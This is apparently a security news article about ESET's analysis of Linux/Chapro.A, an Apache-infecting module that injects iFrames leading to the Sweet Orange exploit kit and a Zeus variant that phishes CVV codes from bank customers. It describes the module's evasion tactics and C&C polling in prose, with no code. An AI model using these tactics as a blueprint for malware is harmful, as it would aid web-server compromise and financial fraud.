The malware, discovered by ESET and termed Linux/Chapro.A, infects the Apache software that drives more than half of the internet’s web servers. The sample analyzed by ESET injects an iFrame into web pages served by the site to visitors, although ESET notes it could as easily be malicious JavaScript or some other attack. The iFrame in this case redirects the user’s browser to the Sweet Orange exploit pack hosted on a separate server in Lithuania. Sweet Orange attempts to exploit one of four vulnerabilities found in many browsers – two being Java, one Internet Explorer and one Adobe Reader.
Chapro goes to some length to avoid discovery. First it checks the visiting browser, and ignores those that are unlikely to be vulnerable to the exploit kit. It also ignores SSH connections – and it drops its own cookie onto the browser to avoid attempting to re-infect repeat visitors. All of these features are attempts to prevent administrators spotting the malware, and researchers tracing the source of discovered infections: the purpose is to keep the malware conduit alive.
So long as Chapro remains undiscovered, detection and disclosure of the exploit site is less important. Chapro communicates with its C&C server every ten minutes and receives the iFrame to be injected. If the exploit site is taken down, the C&C operator can deliver a new iFrame redirecting visitors to a different exploit site.
The Zeus variant ultimately delivered by this particular attack targets primarily Russian and European banks. In one example described by ESET, the bank’s log-in warning never to input PIN or CVC/CVV codes is simply removed by the malware. “Once the user has logged into his account, the malware will inject a pop-up asking for the CVV code for his card, which is exactly the behavior outlined in the warning on the original login form,” reports ESET. The malware will then try to send the user credentials, along with the CVV, to the botnet operator.
“The attack,” says Pierre-Marc Bureau, ESET security intelligence program manager, “shows the increased complexity of malware attacks. This complicated case spreads across three different countries, targeting users from a fourth one, making it very hard for law enforcement agencies to investigate and mitigate its effects.” Both the Chapro C&C server in Germany and the Sweet Orange exploit server in Lithuania are now off-line.